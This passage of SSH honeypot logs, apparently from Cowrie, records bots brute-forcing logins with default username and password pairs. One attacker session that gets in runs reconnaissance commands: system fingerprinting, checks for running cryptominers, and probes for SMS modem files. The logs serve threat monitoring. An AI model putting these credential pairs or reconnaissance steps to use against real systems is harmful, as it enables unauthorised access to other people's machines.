mac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:11:00.306915Z","src_ip":"185.255.91.51","session":"009ecc9e6e9e"}
{"eventid":"cowrie.login.failed","username":"jupyterhub","password":"jupyterhub","message":"login attempt [jupyterhub/jupyterhub] failed","sensor":"my-vps","timestamp":"2025-09-08T15:11:00.703129Z","src_ip":"185.255.91.51","session":"009ecc9e6e9e"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:11:01.803059Z","src_ip":"185.255.91.51","session":"009ecc9e6e9e"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":59692,"dst_ip":"1.2.3.4","dst_port":22,"session":"0814fc765486","protocol":"ssh","message":"New connection: 158.51.124.56:59692 (1.2.3.4:22) [session: 0814fc765486]","sensor":"my-vps","timestamp":"2025-09-08T15:11:50.096503Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:11:50.097392Z","src_ip":"158.51.124.56","session":"0814fc765486"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:11:50.236547Z","src_ip":"158.51.124.56","session":"0814fc765486"}
{"eventid":"cowrie.login.failed","username":"sqldba","password":"12345","message":"login attempt [sqldba/12345] failed","sensor":"my-vps","timestamp":"2025-09-08T15:11:50.831734Z","src_ip":"158.51.124.56","session":"0814fc765486"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:11:51.972250Z","src_ip":"158.51.124.56","session":"0814fc765486"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":48886,"dst_ip":"1.2.3.4","dst_port":22,"session":"b2aaa7621905","protocol":"ssh","message":"New connection: 185.255.91.51:48886 (1.2.3.4:22) [session: b2aaa7621905]","sensor":"my-vps","timestamp":"2025-09-08T15:12:13.467952Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:12:13.468643Z","src_ip":"185.255.91.51","session":"b2aaa7621905"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:12:13.567177Z","src_ip":"185.255.91.51","session":"b2aaa7621905"}
{"eventid":"cowrie.login.failed","username":"developer","password":"developer@123","message":"login attempt [developer/developer@123] failed","sensor":"my-vps","timestamp":"2025-09-08T15:12:14.007644Z","src_ip":"185.255.91.51","session":"b2aaa7621905"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:12:15.109710Z","src_ip":"185.255.91.51","session":"b2aaa7621905"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43084,"dst_ip":"1.2.3.4","dst_port":22,"session":"cfe7fe352a3d","protocol":"ssh","message":"New connection: 212.227.125.160:43084 (1.2.3.4:22) [session: cfe7fe352a3d]","sensor":"my-vps","timestamp":"2025-09-08T15:12:15.899962Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.0","message":"Remote SSH version: SSH-2.0-libssh2_1.11.0","sensor":"my-vps","timestamp":"2025-09-08T15:12:15.900944Z","src_ip":"212.227.125.160","session":"cfe7fe352a3d"}
{"eventid":"cowrie.client.kex","hassh":"0079dec6da0c13e5e8d1ea56ca556b64","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c;aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-rsa-cert-v01@openssh.com","ssh-dss"],"encCS":["aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0079dec6da0c13e5e8d1ea56ca556b64","sensor":"my-vps","timestamp":"2025-09-08T15:12:16.227353Z","src_ip":"212.227.125.160","session":"cfe7fe352a3d"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-09-08T15:12:17.871988Z","src_ip":"212.227.125.160","session":"cfe7fe352a3d"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-08T15:12:19.200747Z","src_ip":"212.227.125.160","session":"cfe7fe352a3d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T15:12:19.907471Z","src_ip":"212.227.125.160","session":"cfe7fe352a3d"}
{"eventid":"cowrie.command.input","input":"/ip cloud print","message":"CMD: /ip cloud print","sensor":"my-vps","timestamp":"2025-09-08T15:12:19.908153Z","src_ip":"212.227.125.160","session":"cfe7fe352a3d"}
{"eventid":"cowrie.command.failed","input":"/ip cloud print","message":"Command not found: /ip cloud print","sensor":"my-vps","timestamp":"2025-09-08T15:12:19.908528Z","src_ip":"212.227.125.160","session":"cfe7fe352a3d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d","size":30,"shasum":"b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:12:20.241505Z","src_ip":"212.227.125.160","session":"cfe7fe352a3d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T15:12:20.913316Z","src_ip":"212.227.125.160","session":"cfe7fe352a3d"}
{"eventid":"cowrie.command.input","input":"ifconfig","message":"CMD: ifconfig","sensor":"my-vps","timestamp":"2025-09-08T15:12:20.914158Z","src_ip":"212.227.125.160","session":"cfe7fe352a3d"}
{"eventid":"cowrie.session.connect","src_ip":"47.76.157.67","src_port":37378,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b151be305b7","protocol":"ssh","message":"New connection: 47.76.157.67:37378 (1.2.3.4:22) [session: 2b151be305b7]","sensor":"my-vps","timestamp":"2025-09-08T15:12:21.188475Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T15:12:21.189384Z","src_ip":"47.76.157.67","session":"2b151be305b7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e","size":901,"shasum":"1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:12:21.242351Z","src_ip":"212.227.125.160","session":"cfe7fe352a3d"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-08T15:12:21.400928Z","src_ip":"47.76.157.67","session":"2b151be305b7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T15:12:22.004028Z","src_ip":"212.227.125.160","session":"cfe7fe352a3d"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-09-08T15:12:22.004946Z","src_ip":"212.227.125.160","session":"cfe7fe352a3d"}
{"eventid":"cowrie.login.success","username":"root","password":" ","message":"login attempt [root/ ] succeeded","sensor":"my-vps","timestamp":"2025-09-08T15:12:22.038984Z","src_ip":"47.76.157.67","session":"2b151be305b7"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:12:22.253764Z","src_ip":"47.76.157.67","session":"2b151be305b7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:12:22.333932Z","src_ip":"212.227.125.160","session":"cfe7fe352a3d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T15:12:23.005339Z","src_ip":"212.227.125.160","session":"cfe7fe352a3d"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo","message":"CMD: cat /proc/cpuinfo","sensor":"my-vps","timestamp":"2025-09-08T15:12:23.006069Z","src_ip":"212.227.125.160","session":"cfe7fe352a3d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a","size":1412,"shasum":"52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:12:23.338504Z","src_ip":"212.227.125.160","session":"cfe7fe352a3d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T15:12:24.085976Z","src_ip":"212.227.125.160","session":"cfe7fe352a3d"}
{"eventid":"cowrie.command.input","input":"ps | grep '[Mm]iner'","message":"CMD: ps | grep '[Mm]iner'","sensor":"my-vps","timestamp":"2025-09-08T15:12:24.086722Z","src_ip":"212.227.125.160","session":"cfe7fe352a3d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904","size":0,"shasum":"4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:12:24.420748Z","src_ip":"212.227.125.160","session":"cfe7fe352a3d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T15:12:25.132397Z","src_ip":"212.227.125.160","session":"cfe7fe352a3d"}
{"eventid":"cowrie.command.input","input":"ps -ef | grep '[Mm]iner'","message":"CMD: ps -ef | grep '[Mm]iner'","sensor":"my-vps","timestamp":"2025-09-08T15:12:25.133089Z","src_ip":"212.227.125.160","session":"cfe7fe352a3d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437","size":0,"shasum":"e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:12:25.464174Z","src_ip":"212.227.125.160","session":"cfe7fe352a3d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T15:12:26.133498Z","src_ip":"212.227.125.160","session":"cfe7fe352a3d"}
{"eventid":"cowrie.command.input","input":"ls -la /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*","message":"CMD: ls -la /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*","sensor":"my-vps","timestamp":"2025-09-08T15:12:26.134182Z","src_ip":"212.227.125.160","session":"cfe7fe352a3d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/baaa3eb1b4234e92bb652c2992277b87dbe17c9080a5f6d842fc72563087dbd8","size":620,"shasum":"baaa3eb1b4234e92bb652c2992277b87dbe17c9080a5f6d842fc72563087dbd8","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/baaa3eb1b4234e92bb652c2992277b87dbe17c9080a5f6d842fc72563087dbd8 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:12:26.464788Z","src_ip":"212.227.125.160","session":"cfe7fe352a3d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T15:12:27.205573Z","src_ip":"212.227.125.160","session":"cfe7fe352a3d"}
{"eventid":"cowrie.command.input","input":"echo Hi | cat -n","message":"CMD: echo Hi | cat -n","sensor":"my-vps","timestamp":"2025-09-08T15:12:27.206237Z","src_ip":"212.227.125.160","session":"cfe7fe352a3d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e","size":11,"shasum":"3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:12:27.534633Z","src_ip":"212.227.125.160","session":"cfe7fe352a3d"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":57254,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee60e0257e1e","protocol":"ssh","message":"New connection: 158.51.124.56:57254 (1.2.3.4:22) [session: ee60e0257e1e]","sensor":"my-vps","timestamp":"2025-09-08T15:12:56.220904Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:12:56.221800Z","src_ip":"158.51.124.56","session":"ee60e0257e1e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:12:56.362136Z","src_ip":"158.51.124.56","session":"ee60e0257e1e"}
{"eventid":"cowrie.login.failed","username":"db1inst1","password":"password1","message":"login attempt [db1inst1/password1] failed","sensor":"my-vps","timestamp":"2025-09-08T15:12:56.962276Z","src_ip":"158.51.124.56","session":"ee60e0257e1e"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:12:58.105234Z","src_ip":"158.51.124.56","session":"ee60e0257e1e"}
{"eventid":"cowrie.session.closed","duration":"56.2","message":"Connection lost after 56.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:13:12.103150Z","src_ip":"212.227.125.160","session":"cfe7fe352a3d"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":35350,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6452e5ecc04","protocol":"ssh","message":"New connection: 185.255.91.51:35350 (1.2.3.4:22) [session: e6452e5ecc04]","sensor":"my-vps","timestamp":"2025-09-08T15:13:26.100416Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:13:26.103565Z","src_ip":"185.255.91.51","session":"e6452e5ecc04"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:13:26.202532Z","src_ip":"185.255.91.51","session":"e6452e5ecc04"}
{"eventid":"cowrie.login.failed","username":"stack","password":"password","message":"login attempt [stack/password] failed","sensor":"my-vps","timestamp":"2025-09-08T15:13:26.601100Z","src_ip":"185.255.91.51","session":"e6452e5ecc04"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:13:27.701375Z","src_ip":"185.255.91.51","session":"e6452e5ecc04"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":54814,"dst_ip":"1.2.3.4","dst_port":22,"session":"976f536a9374","protocol":"ssh","message":"New connection: 158.51.124.56:54814 (1.2.3.4:22) [session: 976f536a9374]","sensor":"my-vps","timestamp":"2025-09-08T15:13:58.817566Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:13:58.818484Z","src_ip":"158.51.124.56","session":"976f536a9374"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:13:58.957787Z","src_ip":"158.51.124.56","session":"976f536a9374"}
{"eventid":"cowrie.login.success","username":"root","password":"palosanto","message":"login attempt [root/palosanto] succeeded","sensor":"my-vps","timestamp":"2025-09-08T15:13:59.555806Z","src_ip":"158.51.124.56","session":"976f536a9374"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T15:13:59.892318Z","src_ip":"158.51.124.56","session":"976f536a9374"}
